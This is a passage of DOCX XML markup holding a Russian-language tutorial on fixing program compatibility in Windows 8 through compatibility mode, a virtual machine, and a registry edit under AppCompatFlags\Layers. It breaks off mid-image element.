      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткие теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Начиная с XP, было выпущено уже несколько линеек ОС от MicroSoft: Vista, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7, 8, 8.1, 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">И любой пользователь, который перешел в свое время с XP на одну из этих более новых операционных систем, столкнулся с проблемой неработоспособности многих приложений, которые в предыдущей версии работали без проблем.Все дело в совместимости ОС с ПО. Самой проблемной операционной системой в этом плане стала Windows 8. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим несколько вариантов решения проблемы совместимости windows 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основная причина неработоспособности программных продуктов на разных ОС – это разные рабочие библиотеки системы. В каждой операционке они имеют разное размещение директорий (да и содержимого в конечном итоге). При попытке запустить приложение, которое было разработано для XP на виндовс 8, утилита не может найти нужные библиотеки, и отказывается запускаться.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1. Стандартное программное обеспечение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это очень простой метод, который в большинстве случаев решает проблему работоспособности утилит на разных операционных системах, в том числе и на Виндовс 8. Для этого нам нужно:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажать правую кнопочку мыши на нужном приложении и опустить курсор в самый низ к опции </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь в появившемся окне мы сможем найти вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совместимость</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В пункте </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Режим совместимости</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеется графа </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить программу в режиме совместимости с:</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Напротив этой графы мы ставим галочку: теперь нам станут доступны версии операционной системы, для которых, изначально, ПО и было разработано.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1958340" cy="1649095"/>
            <wp:effectExtent l="19050" t="0" r="3810" b="0"/>
            <wp:docPr id="147" name="Рисунок 2" descr="Режим совместимости в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ежим совместимости в windows"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1958340" cy="1649095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбираем нужную операционку и нажимаем на кнопочки </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Применить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ок</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все готово, при следующем запуске программа будет запущена уже с учетом изменений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Также оговариваемую проблему вы можете решить в автоматическом режиме. Этот вариант доступен для любого пользователя, даже для новичка. Просто нажмите на ярлыке программы или игры правой кнопочкой мышки и вы увидите опцию </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Исправление проблем с совместимостью</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и дальше следуйте инструкции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2. Виртуальная машина с нужной операционной системой</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если после того, как вы выполнили вариант, который я привел выше, ваше приложение не запустилось, следует перейти к более кардинальным методам, а именно к установке нужной для софта ОС на виртуальную машину. Такой метод займет немного больше времени, но он гарантирует вам 100% работоспособность утилиты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если вы не знаете, как создавать виртуальные машины и устанавливать на них операционные системы, тогда ищите ответ в другой статье, а сейчас просто предлагаю вам этот метод, как действенный вариант.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Только отмечу, что MicroSoft Virtual PC – одно из самых популярных программных продуктов для подобных манипуляций. Инструкция, которой следует придерживаться при установке и использованию виртуальной машины, имеется на официальном сайте MicroSoft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если установка виртуальной машины вам не по плечу, вашу нерешительность или не знание может исправить курс </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Гений компьютерщик</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Вы научитесь не только использовать виртуальные машины в своих целях, но и узнаете многие другие компьютерные премудрости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3. Редактирование реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Один из самых сложных методов, который требует от пользователя максимум внимания. Сперва нужно открыть среду редактора реестра, для этого нажмите на клавиатуре клавишу Win (клавиша с окошком) и, не отпуская ее, жмите R.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В открывшемся окошке необходимо ввести команду для запуска редактора – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>regedit</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3858895" cy="403225"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="146" name="Рисунок 4" descr="команда reg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оманда regedit"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3858895" cy="403225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перед вами появился редактор реестра ОС и ПО. Дальше</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>проходим</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>директории</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows NT</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CurrentVersion</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppCompatFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layers</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этот путь приведет нас к разделу, где уже имеются программные продукты, к которым была применена совместимость.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
